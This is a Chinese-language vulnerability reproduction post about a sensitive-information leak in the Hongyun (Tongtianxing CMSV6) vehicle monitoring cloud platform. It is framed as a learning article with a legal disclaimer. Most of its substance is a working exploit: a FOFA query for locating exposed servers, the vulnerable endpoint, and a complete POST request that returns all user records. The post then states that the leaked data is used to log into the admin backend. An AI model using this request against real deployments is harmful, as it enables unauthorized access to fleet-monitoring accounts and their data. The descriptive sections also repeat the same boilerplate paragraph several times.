本文主要是介绍鸿运(通天星CMSV6车载)主动安全监控云平台敏感信息泄露漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 前言
- 声明
- 一、系统简介
- 二、漏洞描述
- 三、影响版本
- 四、漏洞复现
- 五、修复建议
前言
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。
声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、系统简介
鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
二、漏洞描述
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、云应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。
三、影响版本
鸿运(通天星CMSV6车载)主动安全监控云平台
四、漏洞复现
FOFA:body="./open/webApi.html"||body="/808gps/"
漏洞链接:http://127.0.0.1/808gps/StandardLoginAction_getAllUser.action
漏洞数据包:
POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 9
Content-Type: application/x-www-form-urlencodedjson=null
利用泄露的信息登录后台
五、修复建议
请联系厂商打补丁或者升级到最新版本。
这篇关于鸿运(通天星CMSV6车载)主动安全监控云平台敏感信息泄露漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!